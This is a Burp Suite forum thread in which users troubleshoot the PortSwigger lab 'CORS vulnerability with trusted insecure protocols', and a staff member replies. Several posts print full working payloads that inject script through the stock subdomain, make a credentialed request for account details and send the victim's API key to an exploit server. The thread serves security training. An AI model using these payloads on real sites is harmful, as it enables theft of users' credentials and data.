Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Faulty Lab: "CORS vulnerability with trusted insecure protocols"

Nemeses5174 | Last updated: Dec 30, 2023 03:22PM UTC

Hi, maybe there is bug inside the laboratory "CORS vulnerability with trusted insecure protocols". The following exploit script works with Burp's Chrome: <script> document.location = "https://stock.[LAB-ID].web-security-academy.net/?storeId=hi&productId=%27%3Cscript%3E+function+submitRequest%28%29+%7B+var+xhr+%3D+new+XMLHttpRequest%28%29%3B+xhr.open%28%22GET%22%2C+%22https%3A%5C%2F%5C%2F[LAB-ID].web-security-academy.net%5C%2FaccountDetails%22%2C+true%29%3B+xhr.withCredentials+%3D+true%3B+xhr.onload+%3D+%28%29+%3D%3E+%7B+document.location+%3D+%22https%3A%2F%2F[EXPLOIT-SERVER-ID].exploit-server.net%2F%3Fabcd%3D%22+%2B+xhr.responseText%3B+%7D%3B+xhr.send%28%29%3B+%7D+submitRequest%28%29%3B+%3C%2Fscript%3E%27" </script> The secret admin API-KEY will be recorded in the exploit server's log page. BUT the exploit script above does NOT work when I deliver it to the victim (the victim open the exploit page but the api-key is not recorded in the exploit-server's log page). If I use the solution code (very similar to the one above) everything works great. Maybe a bug in the laboratory? Have a good day.

Ben, PortSwigger Agent | Last updated: Jan 09, 2024 09:39AM UTC

Hi, To confirm, does your exploit work when you use the 'View exploit' functionality i.e. you land on the log page and your users API key is in the URL?

Łukasz | Last updated: Mar 11, 2024 03:00PM UTC

Also don't get it but it appears that URL encoding messes this up, while I tried: <script> document.location="http://stock.0afc00d603b5d54082d510900049005b.web-security-academy.net/?productId=4%3cscript>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0afc00d603b5d54082d510900049005b.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0af300790394d58f82b60f24012b00d4.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1" </script> (so only one < at first script element encoded more) it also didn't work but using exact option from solution worked: <script> document.location="http://stock.0afc00d603b5d54082d510900049005b.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0afc00d603b5d54082d510900049005b.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0af300790394d58f82b60f24012b00d4.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1" </script>

Ben, PortSwigger Agent | Last updated: Mar 12, 2024 11:23AM UTC

Hi Łukasz, Your proposed exploit appears to work for me and allows me to obtain the administrator users API key for this particular lab. Are you seeing no interactions from the victim user in the access logs when you deliver this?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.